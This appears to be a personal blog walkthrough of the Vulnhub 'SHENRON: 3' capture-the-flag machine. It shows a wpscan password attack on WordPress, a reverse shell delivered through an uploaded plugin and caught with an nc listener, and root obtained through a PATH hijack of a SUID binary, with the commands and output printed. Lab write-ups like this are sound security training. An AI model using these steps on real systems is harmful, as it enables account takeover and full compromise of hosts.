Vulnhub: SHENRON: 3
SHENRON: 3
This is SHENRON: 3 from Vulnhub. It says that it is ‘beginner’. Well some days I still feel like a beginner, so okey dokey. Actually I think that’s about right for the foothold, not so sure for the privesc. Anyway!
Ports
HTTP only.
Web
It’s wordpress, with a relatively simple password so it’s a password attack:
┌──(root💀kali)-[/opt/vulnhub/shenron3]
└─# wpscan -U admin -P /usr/share/wordlists/rockyou.txt --url http://shenron 4 ⨯
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.17
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://shenron/ [192.168.1.215]
[+] Started: Sun May 2 05:54:48 2021
# etc
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - admin / iloverockyou
Trying admin / imhere Time: 00:04:19 < > (31535 / 14375927) 0.21% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: admin, Password: iloverockyou
# more etcOnce logged in, I upload a new plugin (shell, zipped) and activate it; nice and easy. Just by the way if anyone else ever reads this I’ve definitely explained this before that’s why I’m not detailing the steps here. There’s a bit more detail here, but it’s basically create a reverse shell (one liner is fine) in a specific wordpress plugin format, zip it and then use the GUI to upload and activate it. Work through the plugins menu. Make sure the listener is started and you will see this:
┌──(root💀kali)-[/opt/vulnhub/shenron3]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.1.210] from (UNKNOWN) [192.168.1.215] 41256
bash: cannot set terminal process group (500): Inappropriate ioctl for device
bash: no job control in this shell
www-data@shenron:/var/www/html/wp-admin$ python3 -c 'import pty;pty.spawn("/bin/bash");'
<in$ python3 -c 'import pty;pty.spawn("/bin/bash");'
# etcPrivesc
We can use our password from before to become shenron:
www-data@shenron:/var/www/html$ su shenron
su shenron
Password: iloverockyou
shenron@shenron:/var/www/html$ sudo -l
sudo -l
[sudo] password for shenron: iloverockyou
Sorry, user shenron may not run sudo on shenron.Now what? We have a file:
shenron@shenron:~$ ls -lash
ls -lash
total 48K
4.0K drwx------ 3 shenron shenron 4.0K Apr 16 15:11 .
4.0K drwxr-xr-x 3 root root 4.0K Apr 15 18:41 ..
4.0K -rwx------ 1 shenron shenron 220 Apr 15 18:41 .bash_logout
4.0K -rwx------ 1 shenron shenron 3.7K Apr 15 18:41 .bashrc
4.0K drwx------ 2 shenron shenron 4.0K Apr 15 18:49 .cache
4.0K -rwx------ 1 shenron shenron 33 Apr 16 10:20 local.txt
20K -rwsr-xr-x 1 root root 17K Apr 15 21:58 network
4.0K -rwx------ 1 shenron shenron 807 Apr 15 18:41 .profile
0 -rwx------ 1 shenron shenron 0 Apr 15 18:49 .sudo_as_admin_successful
shenron@shenron:~$ file network
file network
network: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=6476f9265aa3cac2c49457d79d33714b65d2644e, for GNU/Linux 3.2.0, not stripped
shenron@shenron:~$ strings network
strings network
Command 'strings' not found, but can be installed with:
apt install binutils
Please ask your administrator.
shenron@shenron:~$ gdb network
gdb network
Command 'gdb' not found, but can be installed with:
apt install gdb
Please ask your administrator.It’s SUID (hence the S bit), but we can’t immediately see what it does. It’s not a standard linux binary. We could probably exfil it if we really tried, but let’s just run it (this is probably a bad idea):
shenron@shenron:~$ ./network
./network
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 506/mysqld
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 321/systemd-resolve
tcp6 0 0 :::80 :::* LISTEN 500/apache2
udp 0 0 127.0.0.53:53 0.0.0.0:* 321/systemd-resolve
udp 0 0 192.168.1.215:68 0.0.0.0:* 245/systemd-network Does this look familiar? What it we do this?
shenron@shenron:~$ netstat -ntp
netstat -ntp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 192.168.1.215:41256 192.168.1.210:1234 ESTABLISHED -
tcp6 0 0 192.168.1.215:80 192.168.1.210:52372 ESTABLISHED - So at this point I’m assuming the network binary is calling netstat, probably without a path since this is a CTF and we want to be root :) Let’s go:
shenron@shenron:~$ which netstat
which netstat
/usr/bin/netstat
shenron@shenron:~$ echo sh > netstat
echo sh > netstat
shenron@shenron:~$ chmod +x netstat
chmod +x netstat
shenron@shenron:~$ export PATH=./:$PATH
export PATH=./:$PATH
shenron@shenron:~$ ./network
./network
# id;hostname;date
id;hostname;date
uid=0(root) gid=0(root) groups=0(root),1000(shenron)
shenron
Sun 02 May 2021 03:42:36 PM IST
# cat /root/root.txt
cat /root/root.txt
# ASCII art removed
Your Root Flag Is Here :- a7ed78963dffd9450a34fcc4a0eecb98
Keep Supporting Me. ;-) Well, that was a good guess.